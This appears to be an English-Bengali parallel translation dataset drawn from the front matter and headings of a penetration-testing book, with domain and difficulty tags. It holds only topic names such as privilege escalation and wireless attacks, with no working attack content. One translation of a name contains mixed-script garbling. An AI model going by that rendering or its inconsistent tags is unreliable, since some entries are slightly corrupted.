হ্যাশ সংরক্ষণাগার।
bn
technical
simple
Local privilege escalation.
স্থানীয় সুযোগ বৃদ্ধি।
bn
technical
moderate
Nessus detection of vulnerabilities.
দুর্বলতা সনাক্তকরণের জন্য নেসাস ব্যবহার।
bn
technical
moderate
Setup to behave as member of Windows domain.
উইন্ডোজ ডোমেনের সদস্য হিসাবে কাজ করার জন্য সেটআপ করুন।
bn
technical
moderate
The book was printed and bound by Sheridan Books, Inc. in Chelsea, Michigan.
বইটি মিশিগানের চেলসিতে অবস্থিত শেরिडান বুকস, ইনকর্পোরেটেড দ্বারা মুদ্রিত ও বাঁধাই করা হয়েছে।
bn
general
moderate
The paper is 60# Finch Offset, which is certified by the Forest Stewardship Council (FSC).
কাগজটি হলো ৬০# ফিঞ্চ অফসেট, যা ফরেস্ট স্টুয়ার্ডশিপ কাউন্সিল (FSC) দ্বারা প্রত্যয়িত।
bn
technical
moderate
Visit http://nostarch.com/pentesting/ for updates, errata, and other information.
আপডেট, ভুল সংশোধন এবং অন্যান্য তথ্যের জন্য http://nostarch.com/pentesting/ দেখুন।
bn
technical
simple
phone: 800.420.7240 or 415.863.9900
ফোন: 800.420.7240 অথবা 415.863.9900
bn
general
simple
email: sales@nostarch.com
ইমেইল: sales@nostarch.com
bn
general
simple
web : w w w.nostarch.com
ওয়েবসাইট: w w w.nostarch.com
bn
general
simple
Downloading the Software to Build Your Virtual Lab
আপনার ভার্চুয়াল ল্যাব তৈরি করতে সফ্টওয়্যার ডাউনলোড করা হচ্ছে
bn
technical
moderate
You’ll find links for the resources used in this book at http://www.nostarch.com/ pentesting/
আপনি এই বইটিতে ব্যবহৃত সংস্থানগুলির লিঙ্কগুলি http://www.nostarch.com/ pentesting/ এ খুঁজে পাবেন।
bn
technical
moderate
Use the password 1stPentestBook?! to open the 7-Zip archive containing the book’s resources.
বইটির সম্পদ ধারণকারী ৭-জিপ আর্কাইভ খুলতে 1stPentestBook?! পাসওয়ার্ডটি ব্যবহার করুন।
bn
technical
moderate
You can find 7-Zip programs for Windows and Linux platforms at http :// www.7-zip.org/download.html.
আপনি উইন্ডোজ এবং লিনাক্স প্ল্যাটফর্মের জন্য ৭-জিপ প্রোগ্রামগুলি http :// www.7-zip.org/download.html-এ খুঁজে পেতে পারেন।
bn
technical
moderate
Mac users can use Ez7z from http://ez7z .en.softonic .com/mac/.
ম্যাক ব্যবহারকারীরা http://ez7z .en.softonic .com/mac/ থেকে Ez7z ব্যবহার করতে পারেন।
bn
technical
moderate
If you’re unable to download the files or you’d just like them delivered to your doorstep, we’ll send you a DVD containing the files for US $10.
যদি আপনি ফাইলগুলি ডাউনলোড করতে অক্ষম হন বা সেগুলি আপনার দোরগোড়ায় পেতে চান, তবে আমরা আপনাকে US $10 মূল্যে ফাইলগুলি সহ একটি ডিভিডি পাঠাব।
bn
general
complex
You’ll find additional resources at Georgia Weidman’s website: http :// bulbsecurity.com/.
আপনি জর্জিয়া ওয়েইডম্যানের ওয়েবসাইটে অতিরিক্ত সংস্থানগুলি খুঁজে পাবেন: http :// bulbsecurity.com/।
bn
technical
moderate
Wireless attacks.
ওয়্যারলেস আক্রমণ।
bn
technical
simple
Capturing packets.
প্যাকেট ধরা।
bn
technical
simple
Scanning for access points.
অ্যাক্সেস পয়েন্টগুলির জন্য স্ক্যান করা।
bn
technical
simple